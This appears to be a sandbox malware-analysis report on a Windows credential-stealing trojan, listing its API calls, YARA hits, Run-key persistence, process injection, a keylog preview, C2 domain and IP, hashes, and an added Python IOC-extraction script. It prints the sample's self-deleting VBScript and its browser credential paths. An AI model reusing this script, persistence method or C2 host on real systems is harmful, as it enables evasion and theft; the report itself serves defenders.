Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: EnumSystemLocalesW | 2_2_00110D42
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: EnumSystemLocalesW | 2_2_00110DDD
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 2_2_00110E6A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004BE9CD GetSystemTimeAsFileTime,__aulldiv | 0_2_004BE9CD
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DA7A2 GetComputerNameExW,GetUserNameW | 2_2_000DA7A2
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_0010800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free | 2_2_0010800F
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004999D0 GetVersionExA | 0_2_004999D0
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

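Read together, the behaviour lines in the Persistence, Evasion and OS Protection Evasion sections above give a responder a compact host-side picture: a Run value named PerfectouinVans, a PE dropped under the user's Documents folder, a VBS in Temp run through wscript.exe that then deletes the original sample, a PE image (bytes 4D5A) written into a second instance of the same executable at base C0000, and thousands of Sleep calls on one thread. The script below is an added example, not Joe Sandbox code, showing how to turn such lines into IOCs and triage findings automatically. Its input is a constructed set of findings copied from this report and normalised to one "Source: <origin> | <observation>" line each; the thresholds it applies (the sandbox's own "> 30" sleep-count rule, a script host launched from %TEMP%, a PE dropped under Documents) are this example's assumptions, not rules from the report.

```python
import re
from dataclasses import dataclass, field

# Constructed input: findings copied from the report above, one per line,
# normalised to "Source: <origin> | <observation>". Not verbatim sandbox output.
REPORT_LINES = r"""
Source: unknown | Process created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
Source: C:\Windows\SysWOW64\wscript.exe | File deleted: c:\users\user\desktop\4wecqobvyc.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Memory written: C:\Users\user\Desktop\4wECQoBvYC.exe base: C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep count: 2613 > 30
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep count: 6867 > 30
"""

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<kind>[^:]+):\s*(?P<detail>.*)$")
WRITE_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)$")
SCRIPT_RE = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"', re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


@dataclass
class Iocs:
    dropped_files: list = field(default_factory=list)     # paths
    run_keys: list = field(default_factory=list)          # (key, value name)
    child_processes: list = field(default_factory=list)   # (parent, image, command line)
    deleted_files: list = field(default_factory=list)     # (deleting process, path)
    injections: list = field(default_factory=list)        # (target, base, leading bytes)
    sleep_calls: int = 0


def parse_report(text: str) -> Iocs:
    """Extract structured IOCs from normalised behaviour lines."""
    iocs = Iocs()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        source, kind, detail = m["source"], m["kind"].strip(), m["detail"].strip()
        if kind == "File created":
            iocs.dropped_files.append(detail)
        elif kind == "Registry value created or modified":
            key, _, value = detail.rpartition(" ")       # "<key path> <value name>"
            iocs.run_keys.append((key, value))
        elif kind == "Process created":
            image, _, cmdline = detail.partition(" ")    # "<image> <command line>"
            iocs.child_processes.append((source, image, cmdline))
        elif kind == "File deleted":
            iocs.deleted_files.append((source, detail))
        elif kind == "Memory written":
            w = WRITE_RE.match(detail)
            if w:
                iocs.injections.append((w["target"], int(w["base"], 16), w["magic"].upper()))
        elif kind == "Thread sleep count":
            iocs.sleep_calls += int(detail.split()[0])
    return iocs


def assess(iocs: Iocs, sample_path: str) -> list:
    """Turn raw IOCs into the observations a responder acts on."""
    sample = sample_path.lower()                         # Windows paths compare case-insensitively
    findings = []
    for key, value in iocs.run_keys:
        if key.lower().endswith(r"\currentversion\run"):
            findings.append(f"persistence: Run value '{value}' under {key}")
    for path in iocs.dropped_files:
        if path.lower().endswith(".exe") and "\\documents\\" in path.lower():
            findings.append(f"dropped PE in user Documents: {path}")
    for parent, image, cmdline in iocs.child_processes:
        if image.lower().endswith(SCRIPT_HOSTS):
            s = SCRIPT_RE.search(cmdline)
            if s and "\\appdata\\local\\temp\\" in s.group(1).lower():
                findings.append(f"script host run from Temp by {parent}: {s.group(1)}")
    for deleter, path in iocs.deleted_files:
        if path.lower() == sample and deleter.lower().endswith(SCRIPT_HOSTS):
            findings.append(f"self-deletion: {deleter} removed the original sample")
    for target, base, magic in iocs.injections:
        if magic == "4D5A":                              # an MZ header landed in another process
            findings.append(f"PE image written into {target} at 0x{base:X} (process injection)")
    if iocs.sleep_calls > 30:                            # the sandbox's own threshold
        findings.append(f"sleep loop: {iocs.sleep_calls} Sleep calls (sandbox timeout evasion)")
    return findings


if __name__ == "__main__":
    for line in assess(parse_report(REPORT_LINES), r"C:\Users\user\Desktop\4wECQoBvYC.exe"):
        print(line)
```

The self-deletion check is the one most often missed when hunting by exact string match: the sandbox logs the delete with a lower-cased path, so only a case-insensitive comparison links it back to the sample. The Run value name, the Documents\Perfectouin\Bin path and the registros.dat keylog file named in the memory strings above are the artefacts to sweep other hosts for.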
              Stealing of Sensitive Information

Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 2_2_000CB21B
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 2_2_000CB335
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: \key3.db | 2_2_000CB335

              Remote Access Functionality

Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: cmd.exe | 2_2_000C5042
MITRE ATT&CK matrix (rebuilt from the flattened cells, one row per line; a number in front of a technique is the report's count of matched signatures, names without a number are the matrix's empty placeholder cells)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 1 Native API | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Windows Service | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 1 Windows Service | 1 DLL Side-Loading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 122 Process Injection | 1 Bypass User Account Control | LSA Secrets | 24 System Information Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 File Deletion | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1
              Virtualization/Sandbox Evasion
              Proc Filesystem2
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
              Process Injection
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Source | Detection | Scanner | Label
4wECQoBvYC.exe | 29% | ReversingLabs | Win32.Trojan.Dresmon
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
formationslistcomplet2.sexidude.com | 100% | Avira URL Cloud | malware
http://www.evenbalance.com/ | 0% | Avira URL Cloud | safe
http://www.evenbalance.com/index.php?page=pbsvcfaq.php | 0% | Avira URL Cloud | safe
http://www.evenbalance.com/index.php?page=pbsvcfaq.phpChecking | 0% | Avira URL Cloud | safe
http://www.evenbalance.com/troubleticket/ | 0% | Avira URL Cloud | safe
http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster | 0% | Avira URL Cloud | safe
http://www.evenbalance.com/troubletick | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
formationslistcomplet2.sexidude.com | 181.131.217.244 | true | false | | high
geoplugin.net | 178.237.33.50 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
formationslistcomplet2.sexidude.com | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.evenbalance.com/troubletick | 4wECQoBvYC.exe | false | Avira URL Cloud: safe | unknown
http://www.evenbalance.com/ | PerfectouinVans.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://www.evenbalance.com/index.php?page=pbsvcfaq.phpChecking | PerfectouinVans.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://www.evenbalance.com/troubleticket/ | PerfectouinVans.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/ | 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | 4wECQoBvYC.exe, 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, 4wECQoBvYC.exe, 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpl | 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.evenbalance.com/index.php?page=pbsvcfaq.php | PerfectouinVans.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpq | 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster | 4wECQoBvYC.exe, PerfectouinVans.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp: | 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpSystem32 | 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
181.131.217.244 | formationslistcomplet2.sexidude.com | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1571962
                                Start date and time:2024-12-09 22:41:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4wECQoBvYC.exe
                                renamed because original name is a hash value
                                Original Sample Name:472cd96b1b5771243c40c10cd034324e.exe
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@5/4@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 71%
                                • Number of executed functions: 43
                                • Number of non-executed functions: 260
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 4wECQoBvYC.exe
Time | Type | Description
16:42:40 | API Interceptor | 1777688x Sleep call for process: 4wECQoBvYC.exe modified
22:42:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
22:42:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
181.131.217.244 | nlfb.exe | malicious | Unknown |
181.131.217.244 | nlfb.exe | malicious | Unknown |
181.131.217.244 | qtIh.exe | malicious | AsyncRAT, DcRat |
181.131.217.244 | KWAo.exe | malicious | AsyncRAT, DcRat |
181.131.217.244 | build.exe | malicious | Unknown |
181.131.217.244 | build.exe | malicious | Unknown |
178.237.33.50 | Aktarma,pdf.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Ref#60031796.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PEbZthAqV9.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | IB9876789000.bat.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | NewOrder12052024.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | W6iQkG4jZ1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | VERSION.dll.dll | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
formationslistcomplet2.sexidude.com | nlfb.exe | malicious | Unknown | 181.131.217.244
formationslistcomplet2.sexidude.com | nlfb.exe | malicious | Unknown | 181.131.217.244
formationslistcomplet2.sexidude.com | qtIh.exe | malicious | AsyncRAT, DcRat | 181.131.217.244
formationslistcomplet2.sexidude.com | KWAo.exe | malicious | AsyncRAT, DcRat | 181.131.217.244
formationslistcomplet2.sexidude.com | build.exe | malicious | Unknown | 181.131.217.244
formationslistcomplet2.sexidude.com | build.exe | malicious | Unknown | 181.131.217.244
geoplugin.net | Aktarma,pdf.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | Ref#60031796.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PEbZthAqV9.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | IB9876789000.bat.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
geoplugin.net | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
EPMTelecomunicacionesSAESPCO | Owari.m68k.elf | malicious | Unknown | 190.128.48.30
EPMTelecomunicacionesSAESPCO | Owari.mpsl.elf | malicious | Unknown | 190.29.49.244
EPMTelecomunicacionesSAESPCO | jew.m68k.elf | malicious | Unknown | 191.94.154.123
EPMTelecomunicacionesSAESPCO | jew.mpsl.elf | malicious | Unknown | 181.128.175.138
EPMTelecomunicacionesSAESPCO | sora.mips.elf | malicious | Mirai | 190.28.71.120
EPMTelecomunicacionesSAESPCO | i586.elf | malicious | Unknown | 190.71.244.100
EPMTelecomunicacionesSAESPCO | home.arm.elf | malicious | Mirai, Gafgyt | 190.29.50.138
EPMTelecomunicacionesSAESPCO | jew.sh4.elf | malicious | Unknown | 190.70.10.219
EPMTelecomunicacionesSAESPCO | jew.arm6.elf | malicious | Unknown | 191.98.56.88
EPMTelecomunicacionesSAESPCO | jew.sh4.elf | malicious | Unknown | 201.184.41.50
ATOM86-ASATOM86NL | Aktarma,pdf.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Ref#60031796.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PEbZthAqV9.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | IB9876789000.bat.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):488
                                            Entropy (8bit):3.338316661577143
                                            Encrypted:false
                                            SSDEEP:12:6l9NOlMecml9NcbWFe5Ul9NwMQcl9NwEAbWFe5Ul9Ne6cl9NgbW+:6vNKxcmvNoWqUvNwMQcvNwNWqUvNWvNw
                                            MD5:EF1EF533085B93F52C99FAA4F96ED3C5
                                            SHA1:00995B2944CFAE2AA71F1DD95C30FFF51BDE29A3
                                            SHA-256:99D5BFE198CD277CFAE118C24F886F860EE00738551652B469CEAD4033197EB6
                                            SHA-512:C5631851E8ED73336044549F7A07989D2A4AEEC95D9AE3FC6F8012AB153508D89423FFF6A72B3183ED128C9C978983CEF42A8657F99DE450E9FB54891B4542E6
                                            Malicious:false
                                            Reputation:low
Preview (UTF-16LE, decoded):
[2024/12/09 16:42:07 Offline Keylogger Started]
[2024/12/09 16:42:08 Program Manager]
[Win]r
[2024/12/09 16:42:13 Run]
[2024/12/09 16:42:19 Program Manager]
[Win]r
[2024/12/09 16:42:21 Run]
[2024/12/09 16:42:26 Program Manager]
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):963
                                            Entropy (8bit):5.012684553542002
                                            Encrypted:false
                                            SSDEEP:12:tkluJnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluNdbauKyGX85jvXhNlT3/7CcVKWro
                                            MD5:63E9F54FEF35B0883D8C0860F2439D33
                                            SHA1:0D967A12EDADB3087645596E3A31A6B63962AEE9
                                            SHA-256:9BA9E5646C3B7AE142B3D3B202C18DBDF64348DED02151FEFDE725CE36FB1067
                                            SHA-512:0560D4E5D0AD7E48BC96386A6ABB2799355119C0E9590D590B383D8F9CB33F0BF30AB9EA1B350DCE25081CC9D5FB8C18B66FCE3A08B7DFE7DABDD9B0D626FC31
                                            Malicious:false
                                            Reputation:low
Preview:
{
  "geoplugin_request":"8.46.123.228",
  "geoplugin_status":200,
  "geoplugin_delay":"0ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7503",
  "geoplugin_longitude":"-74.0014",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):472
                                            Entropy (8bit):3.5107221010612366
                                            Encrypted:false
                                            SSDEEP:12:xQ4lA2++ugypjBQMPURoFEOw4Q3DxFEOw49Hz/0aimi:7a2+SD/Ow4QT4Ow49Aait
                                            MD5:FE625459219AA77126B7B2EDF44A165E
                                            SHA1:270E12ED960A2E1E767183B6832C4F3259299090
                                            SHA-256:C0B8168638F19DC83B83DD1C66CA5F39CC2B65D4F705418FB643F3228B597F48
                                            SHA-512:B8F082E1D9B7677945D87DF5AA6666D6C27EC57A2D5E245F2232193945BAF52B923B3390E1C0C18132C85BCE094C221D997B58901630E48C8FA40754E6EFEBBC
                                            Malicious:true
                                            Reputation:low
Preview (UTF-16LE, decoded):
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\alfons\Desktop\4wECQoBvYC.exe")
fso.DeleteFile "C:\Users\alfons\Desktop\4wECQoBvYC.exe"
wend
fso.DeleteFile(Wscript.ScriptFullName)
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):979567347
                                            Entropy (8bit):0.0665821266031963
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:A2F65E3E0026D92BC192BBBB7A5F9ABB
                                            SHA1:FE436C6917BEBFBBD1B5F83C3C3314024C4949CB
                                            SHA-256:C399A6F27A2C4E0D39BF2AB8B22E1372B2DB28C54BAE81BDADF21D9D4312D4D6
                                            SHA-512:D39D876A88EA94B21F09B07927CFC38E664D489F55D23836AE83856AA84C2EB8439074D628243407E98A564C4DC23868B5295CC28C3CFEB13797DDF8F95486A6
                                            Malicious:true
                                            Reputation:low
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........j...j...j...b..j...f...j...f..8j...b...j..MI...j...b...j...b...j..mI...j...j...h...}...j...}.^j...f..j..{a...j...f...j..Rich.j..........................PE..L...xm*K.....................P0.....S.............@...........................?.....@:/.....................................<........p...l..............................................................H............................................text...D........................... ..`.rdata..p...........................@..@.data............@..................@....rsrc....l...p...p....,.............@..@................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.596232553765719
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:4wECQoBvYC.exe
                                            File size:4'087'808 bytes
                                            MD5:472cd96b1b5771243c40c10cd034324e
                                            SHA1:e6544fd71357a36bf5bad454a2662ef3af7a4e03
                                            SHA256:24c3329fc783efce51593d5e4274008fcff8d86f8df9fd8a47ca0af8df1e031d
                                            SHA512:3ed7fbffc297595e71193c26e3d6468f943dd94f13fbdd65358c4e47c89ab35f50c294894f6e798e05491de9518d8281864752659f84f33fea589099ed466a1f
                                            SSDEEP:49152:SqXI6JHV5G/XEeLTSB/PzpvxGDNMzZxiOkwSF3Gsw/D+ZuWjH6CiolZ:St6JHS/KnzpvxGpM9xUX3rPjR
